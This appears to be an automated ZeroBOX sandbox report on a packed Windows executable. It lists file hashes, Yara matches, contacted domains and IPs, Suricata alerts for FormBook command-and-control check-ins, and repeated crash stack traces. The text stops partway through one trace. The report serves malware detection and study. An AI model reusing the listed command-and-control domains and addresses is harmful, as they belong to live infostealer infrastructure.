Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 21, 2021, 6:42 p.m.	Oct. 21, 2021, 6:44 p.m.

Size	973.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`43c4f31951dfaa67b56f438bc1454522`
SHA256	`602b818b816dd421212e56f00c0f6ac807e1f01497601fcd49e1e081b8fdcb24`
CRC32	`96D2FE91`
ssdeep	`12288:fDug7DeIhyEzPsO4z+oxMOQWHphA3hHx8rkRZQ9XYBk9NAOe6k1+hO/O5N8DoQTh:rt7JhyEz0O4z+OQK79HHQT2ODA`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
2364

Name	Response	Post-Analysis Lookup
www.septemberstockevent200.com	A 172.67.188.247 A 104.21.65.66	172.67.188.247
www.oooci.com	A 101.35.123.80	101.35.123.80
www.shangduli.space	A 114.95.162.70	114.95.162.70
www.kinmanpowerwashing.com	CNAME kinmanpowerwashing.com A 182.50.132.242	182.50.132.242
www.amaroqadvisors.com	CNAME amaroqadvisors.com A 34.102.136.180	34.102.136.180
www.curebase-test.com
www.swisstradecenter.com	A 217.26.63.20	217.26.63.20
www.getjoyce.net
www.digipoint-entertainment.com
www.oilelm.com	A 172.67.159.113 A 104.21.66.109	172.67.159.113
www.trashwasher.com	CNAME trashwasher.com A 151.101.66.159	151.101.66.159
onedrive.live.com	CNAME odc-web-geo.onedrive.akadns.net CNAME l-0004.l-msedge.net A 13.107.42.13 CNAME odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net CNAME odc-web-brs.onedrive.akadns.net	13.107.42.13
www.cdgdentists.com	CNAME cdgdentists.com A 34.102.136.180	34.102.136.180
owfboa.dm.files.1drv.com	CNAME dm-files.fe.1drv.com CNAME dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net CNAME odc-dm-files-brs.onedrive.akadns.net A 13.107.42.12 CNAME odc-dm-files-geo.onedrive.akadns.net CNAME l-0003.l-msedge.net	13.107.42.12

IP Address	Status	Action
101.35.123.80	Active	Moloch
104.21.66.109	Active	Moloch
114.95.162.70	Active	Moloch
13.107.42.12	Active	Moloch
13.107.42.13	Active	Moloch
151.101.66.159	Active	Moloch
164.124.101.2	Active	Moloch
172.67.188.247	Active	Moloch
182.50.132.242	Active	Moloch
217.26.63.20	Active	Moloch
34.102.136.180	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49174 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 172.67.188.247:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 172.67.188.247:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 172.67.188.247:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 13.107.42.13:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49169 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49170 -> 13.107.42.12:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49177 -> 104.21.66.109:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 104.21.66.109:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 104.21.66.109:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 217.26.63.20:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 217.26.63.20:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 217.26.63.20:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 151.101.66.159:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 151.101.66.159:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 151.101.66.159:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 182.50.132.242:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 182.50.132.242:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 182.50.132.242:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49168 13.107.42.13:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01	CN=onedrive.com	50:2f:33:10:92:ac:27:7b:17:be:82:68:3b:e2:29:ad:97:41:b7:bb
TLSv1 192.168.56.103:49169 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e
TLSv1 192.168.56.103:49170 13.107.42.12:443	C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01	C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com	ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.itext

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more processes crashed (50 out of 124 events)

Time & API	Arguments	Status
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633024 registers.edi: 1633112 registers.eax: 23117 registers.ebp: 1633084 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633148 registers.edi: 1633244 registers.eax: 23117 registers.ebp: 1633208 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002365952	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7758199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7758193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1633040 registers.edi: 1633128 registers.eax: 23117 registers.ebp: 1633100 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7756f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7756f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7758176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7759af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7756f4ef registers.esp: 1632892 registers.edi: 1632988 registers.eax: 23117 registers.ebp: 1632952 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2002262528	1
__exception__ Oct. 21, 2021, 6:42 p.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7757317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7759ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7759af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x775818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7758174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77583e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x76783b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x7517db3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x742f7322 0x5d60e3 0x5d4117 0x5d4204 vbc+0x528a7 @ 0x4528a7 vbc+0x532a9 @ 0x4532a9 vbc+0x546f6 @ 0x4546f6 vbc+0x43e7 @ 0x4043e7 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77579ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77579ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word 